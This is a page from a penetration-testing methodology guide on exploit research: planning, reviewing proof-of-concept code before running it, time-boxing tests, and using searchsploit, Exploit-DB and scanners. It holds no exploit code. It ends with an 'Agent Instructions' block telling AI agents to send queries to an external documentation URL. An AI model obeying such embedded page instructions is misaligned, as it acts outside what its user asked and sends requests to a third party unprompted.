# Exploit Research This phase is critical and is more difficult that it may seem. You should have a plan when you approach this phase of the engagement. What are you hypotheses? What is your objective? What are the obstacles in your way? During the Information Gathering phase, you should have created a list of things to try or research. These should be prioritized in a manner where the highest priority one is the one where you believe will produce the most fruit for where you are at and with what you are trying to accomplish. During this phase you should do a code review on any exploits or POC code that you intend on using. Ideally, you will want to know **exactly** what the code does before you try to run it. Not only could it be malicious but knowing what the exploit is trying to do could help you avoid working with a script that just flat out may not work. There will be times where to code may be over your head. When this happens, do your best to understand a high level at least what the exploit is and what is required for it to work. This phase may go hand in hand with exploit development (modification) and exploit testing. As you are researching potential exploits in a prioritized order, you may want to test exploits that you come across that seem promising. With this in mind, do not spend too long just because it seems promising. Set a timer for 30 min to 1 hour before you move on or at least take a break. It may be helpful to reflect back on what you know, what are you assumptions (hypotheses), what is your evidence, how confident are you, and how can you test them? ## Methodology * [ ] Use searchsploit or [Exploit-DB](https://exploit-db.com) to find potential exploits or information about exploiting a target. Do not ignore the papers as they may provide critical information in helping you understand how the exploit works. * Make sure to look at all the services and check them for vulnerabilities. * [ ] Use your favorite search engine to dig around more about the the exploit(s) that have potential. * [ ] Run one or more vulnerability scanners After you find a potential exploit, review the exploit code and learn what the exploit is and how it works. Give yourself a window of time to test it. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.dragonsploit.com/pentest-methodology/vulnerability-research.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.